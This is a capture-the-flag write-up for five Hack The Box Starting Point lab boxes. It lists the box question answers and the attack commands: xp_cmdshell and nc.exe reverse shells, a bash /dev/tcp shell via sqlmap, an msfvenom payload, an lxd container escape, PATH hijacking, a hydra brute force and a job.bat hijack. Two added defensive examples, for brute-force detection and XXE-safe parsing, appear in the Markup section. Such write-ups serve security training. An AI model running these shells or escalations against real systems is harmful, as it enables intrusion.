Write-up: Hack The Box: Starting Point — Tier 2

Box 1: Archetype

  • Which TCP port is hosting a database server? 1433
  • What is the name of the non-Administrative share available over SMB? backups
$ smbclient \\\\\\backups -U guest
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
impacket-mssqlclient 'ARCHETYPE/sql_svc':'M3g4c0rp123'@10.129.116 -windows-auth
  • What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? mssqlclient.py
  • What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
sp_configure;
-- Enabling sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
$ python3 -m http.server 80
$ sudo nc -lnvp 443
SQL> xp_cmdshell curl --output C:\Users\sql_svc\nc.exe
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc; .\nc.exe -e cmd.exe 443"
  • What script can be used in order to search possible paths to escalate privileges on Windows hosts? winpeas
  • What file contains the administrator’s password? MEGACORP_4dm1n!!
$ impacket-psexec administrator@
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 2: Oopsie

  • What is the path to the directory on the webserver that returns a login page? cdn-cgi/login
  • What can be modified in Firefox to get access to the upload page? cookie
i=0
while [ $i -le 200 ]
do
  echo $i >> numbers.txt
  i=$(($i+1))
done
<?php $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage'); ?>
$ groups robert
robert : robert bugtracker
$ find / -group bugtracker 2>/dev/null
$ ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
$ file /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped
  • What executable is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? find
  • Regardless of which user starts running the bugtracker executable, whose privileges will it use to run? root
  • What does SUID stand for? Set owner User ID
robert@oopsie:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
robert@oopsie:~$ export PATH=/tmp:$PATH
  • What is the name of the executable being called in an insecure manner? cat
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 3: Vaccine

  • Besides SSH and HTTP, what other service is hosted on this box? FTP
  • This service can be configured to allow login with any password for specific username. What is that username? anonymous
  • What is the name of the file downloaded over this service? backup.zip
$ zip2john backup.zip > hash.txt
$ john hash.txt
$ unzip backup.zip
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
        $_SESSION['login'] = "true";
        header("Location: dashboard.php");
    }
}
?>
$ sqlmap -u '' --data 'search=P' --cookie='PHPSESSID=ton2h67hjn3plqh6r9k496dpe0' --os-shell
os-shell> bash -c "bash -i >& /dev/tcp/ 0>&1"
try { $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); }
  • What program can the postgres user run as root using sudo? vi
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 4: Included

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=4444 -f raw > shell.php
  • What is the default system folder that TFTP uses to store files? /var/lib/tftpboot
  • Which interesting file is located in the web server folder and can be used for Lateral Movement? .htpasswd
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
  • What flag do we set to the container so that it has root privileges on the host system? security.privileged=true
  • If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted? /mnt/root/root
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!

Box 5: Markup

$ hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/best15.txt http-post-form "/:username=^USER^&password=^PASS^:Wrong Credentials" -V
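From the defender's side, a wordlist run like the one above leaves a very regular trace: a burst of POSTs to "/" from one client, each answered with the same-size "Wrong Credentials" page. Added example (not from the write-up) that flags such a burst in Apache combined-format access-log lines; the log lines, IPs, timestamps and the 10-per-minute threshold are constructed here, not taken from the box.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-format log lines (not from the original write-up):
# one client hammering the login form at "/" once a second and always getting
# the same 200/1433-byte "Wrong Credentials" page, plus one ordinary visitor.
ATTACKER_LINES = [
    f'10.10.14.5 - - [12/Mar/2023:10:15:{s:02d} +0000] "POST / HTTP/1.1" 200 1433 "-" "Mozilla/5.0"'
    for s in range(12)
]
LEGIT_LINES = [
    '10.10.14.20 - - [12/Mar/2023:10:14:30 +0000] "GET / HTTP/1.1" 200 1433 "-" "Mozilla/5.0"',
    '10.10.14.20 - - [12/Mar/2023:10:14:45 +0000] "POST / HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
SAMPLE_LOG = "\n".join(LEGIT_LINES + ATTACKER_LINES)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def detect_login_bruteforce(log_text, login_path="/", window_s=60, threshold=10):
    """Return {ip: posts_in_busiest_window} for clients that POST to login_path
    at least `threshold` times inside any `window_s`-second sliding window."""
    posts = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != login_path:
            continue
        posts[m["ip"]].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))

    flagged = {}
    for ip, times in posts.items():
        times.sort()
        busiest, start = 0, 0
        for end, t in enumerate(times):
            # slide the window start forward until it fits inside window_s
            while (t - times[start]).total_seconds() > window_s:
                start += 1
            busiest = max(busiest, end - start + 1)
        if busiest >= threshold:
            flagged[ip] = busiest
    return flagged


if __name__ == "__main__":
    print(detect_login_bruteforce(SAMPLE_LOG))  # {'10.10.14.5': 12}
```

Pair the rate check with an identical-response-size condition (the 200/1433 pair above) to separate a credential run from a busy but legitimate client.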
  • What is the word at the top of the page that accepts user input? order
  • What XML version is used on the target? 1.0
  • What does the XXE / XEE attack acronym stand for? XML External Entity
$ ssh daniel@ -i id_rsa
PS > wget -O nc.exe
PS > echo "C:\Log-Management\nc64.exe -e cmd.exe 443" > C:\Log-Management\job.bat
PS > type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 443
  • Submit user flag — Try by yourself!
  • Submit root flag — Try by yourself!
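The order page on this box accepts XML 1.0 input, which is what makes the XXE (XML External Entity) question relevant. Added example (not from the write-up or the box's own code) of how a server should take that input: the standard-library expat parser with every entity declaration refused and parameter-entity parsing switched off, so a submission carrying a DOCTYPE with an external entity is rejected before anything is expanded. The <order> field names and both sample documents are constructed here; the entity in the second sample points at a placeholder URI.

```python
import xml.parsers.expat as expat

class UnsafeXmlError(ValueError):
    """Raised when a submitted document declares entities we refuse to expand."""

def parse_order(xml_text):
    """Parse an <order> document into {field: text}; any entity declaration aborts
    the parse and parameter entities / external DTD subsets are never fetched."""
    fields, stack, buf = {}, [], []
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_entity(name, is_param, value, base, system_id, public_id, notation):
        raise UnsafeXmlError(f"entity declaration refused: {name}")

    def reject_external(context, base, system_id, public_id):
        raise UnsafeXmlError(f"external entity reference refused: {system_id}")

    def start(name, attrs):
        stack.append(name)
        buf.clear()

    def end(name):
        if len(stack) > 1:  # leaf fields only, not the <order> root itself
            fields[name] = "".join(buf).strip()
        stack.pop()
        buf.clear()

    p.EntityDeclHandler = reject_entity
    p.ExternalEntityRefHandler = reject_external
    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = buf.append
    p.Parse(xml_text, True)
    return fields

def is_accepted(xml_text):
    """True when the submission parses without tripping the entity checks."""
    try:
        parse_order(xml_text)
        return True
    except (UnsafeXmlError, expat.ExpatError):
        return False

# Constructed sample submissions (not from the original write-up); placeholder URI only.
SAFE_ORDER = ('<?xml version="1.0"?><order><quantity>3</quantity>'
              '<item>Pen</item><address>Home</address></order>')
XXE_ORDER = ('<?xml version="1.0"?><!DOCTYPE order [<!ENTITY ext SYSTEM "placeholder://blocked">]>'
             '<order><quantity>&ext;</quantity><item>Pen</item><address>Home</address></order>')
```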
